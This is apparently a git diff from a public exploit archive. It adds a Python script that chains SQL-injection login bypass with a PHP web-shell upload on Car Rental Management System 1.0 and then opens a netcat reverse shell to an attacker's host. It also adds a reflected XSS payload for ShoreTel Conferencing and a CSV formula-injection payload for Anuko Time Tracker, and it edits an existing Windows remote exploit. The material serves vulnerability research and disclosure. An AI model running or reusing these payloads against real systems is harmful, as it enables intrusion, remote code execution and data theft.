diff --git a/exploits/php/webapps/49025.py b/exploits/php/webapps/49025.py new file mode 100755 index 000000000..8c0be1ca4 --- /dev/null +++ b/exploits/php/webapps/49025.py @@ -0,0 +1,87 @@ +# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload +# Date: 09-11-2020 +# Exploit Author: Fortunato Lodari [fox at thebrain dot net] +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Debian 10 with apache2 + +# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car +# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA" +# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell +# on the victim system +# +# on the Attacker machine you must listen with NC on a port + +import sys +import requests +import time +import random +import http.cookiejar +import os.path +from os import path +#foxlox# + + + +payload = {"username":"' OR 1=1 limit 1#","password":"moana"} + +proxies = { "http": "http://localhost:8080"} + +#payload = "username=' OR 1=1 limit 1 #&password=ciao" + +def deb(str): + print("Debug => "+str) + +def login(): + deb("Login...") + session=requests.Session() + url = mainurl+"/admin/ajax.php?action=login" + #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'} + r=session.post(url,payload, allow_redirects=False,proxies=proxies) + cookie = r.headers["Set-Cookie"] + deb(cookie) + return cookie + +def find_all(a_str, sub,lbegin,lend): + start = 0 + start = a_str.find(sub, start) + t=(a_str[start+lbegin:start+lend]).replace('"','') + return t + + +def upload(c): + deb("Getting cookie") + c = c.split("=");cookie={c[0]:c[1]} + deb("Sending payload") + filetosend=files = {'img': ('s_hell.php', '\n')} + fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""} + r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend) + deb("Saved Machine"); + r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False) + mid=find_all(r.content,'data-id=',8,11) + deb("Machine id: "+mid) + r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False) + defurl=(find_all(r.content,"assets/uploads/cars_img",0,45)) + deb("Exploit url: "+defurl) + #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id") + exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null" + print("Opening url: "+exploit) + print("Don't forget to run: nc -nvlp "+sys.argv[3]) + os.system(exploit) + + +def usage(): + if len(sys.argv) < 4: + print("Create a PHPShell for Car Rental Management System") + print("example:") + print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT") + exit() + + + +usage() +mainurl = sys.argv[1] +upload(login()) + +#fox \ No newline at end of file diff --git a/exploits/php/webapps/49026.txt b/exploits/php/webapps/49026.txt new file mode 100644 index 000000000..77c1f72e9 --- /dev/null +++ b/exploits/php/webapps/49026.txt @@ -0,0 +1,23 @@ +# Exploit Title: ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting +# Date: 11/8/2020 +# Exploit Author: Joe Helle +# Vendor Homepage: https://www.mitel.com/articles/what-happened-shoretel-products +# Version: 19.46.1802.0 +# Tested on: Linux +# CVE: 2020-28351 + +PoC: + +The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could +allow an unauthenticated attacker to conduct a reflected cross-site +scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient +validation for the time_zone object in the HOME_MEETING& page. + +Vulnerable payload +/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME + +Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown +object is located. Upon executing the payload, the exploit executes when +the mouse is rolled over the dropdown menu object. + +https://github.com/dievus/CVE-2020-28351 \ No newline at end of file diff --git a/exploits/php/webapps/49027.txt b/exploits/php/webapps/49027.txt new file mode 100644 index 000000000..6223bbaa7 --- /dev/null +++ b/exploits/php/webapps/49027.txt @@ -0,0 +1,25 @@ +# Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection +# Date: 2020-10-17 +# Exploit Author: Mufaddal Masalawala +# Vendor Homepage: https://www.anuko.com/ +# Software Link: https://www.anuko.com/time-tracker/index.htm +# Version: 1.19.23.5325 +# Tested on: Kali Linux 2020.3 +# CVE: CVE-2020-15255 +# Proof Of Concept: +CSV Injection (aka Excel Macro Injection or Formula Injection) exists in +Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and +Note data field that is mistreated while exporting to a CSV file. +To exploit this vulnerability: + + 1. Login to the application, goto 'User' module and edit the user + 2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the + 'Name' field + 3. Goto 'Project' module, add a new project with the same malicious + payload in the 'Name' field + 4. Goto 'Time' module, select our created User, Project and again enter + the same payload in 'Note' field + 5. Enter the rest of the details and click 'Submit' + 6. Now goto 'Reports' click Generateand download the CSV file + 7. Open the CSV file, allow all popups and our payload is executed + (calculator is opened). \ No newline at end of file diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py index ae9e6b47a..5e2283930 100755 --- a/exploits/windows/remote/48657.py +++ b/exploits/windows/remote/48657.py @@ -149,7 +149,7 @@ xml_schema = """ -""".replace("<", "<").replace(">", ">").replace('"', """).strip() +""".replace("<", "<").replace(">", ">").replace('"', """).strip() # endregion # region xml_diffgram @@ -234,16 +234,16 @@ config = """ def prepare_update_config(uuid, cmd): config_payload = config config_payload = config_payload.replace('{CMD}', cmd) - config_payload = config_payload.replace('<', '<') - config_payload = config_payload.replace('>', '>') + config_payload = config_payload.replace('<', '<') + config_payload = config_payload.replace('>', '>') diffgram_payload = xml_diffgram diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload) diffgram_payload = diffgram_payload.replace('{ID}', uuid) - diffgram_payload = diffgram_payload.replace('&', '&') - diffgram_payload = diffgram_payload.replace('<', '<') - diffgram_payload = diffgram_payload.replace('>', '>') - diffgram_payload = diffgram_payload.replace('"', '"') + diffgram_payload = diffgram_payload.replace('&', '&') + diffgram_payload = diffgram_payload.replace('<', '<') + diffgram_payload = diffgram_payload.replace('>', '>') + diffgram_payload = diffgram_payload.replace('"', '"') payload = update_config payload = payload.replace('{XMLSCHEMA}', xml_schema) diff --git a/files_exploits.csv b/files_exploits.csv index 4d7871005..e51359df6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40842,6 +40842,9 @@ id,file,description,date,author,type,platform,port 49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware, 49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php, 49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple, +49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php, +49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php, +49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,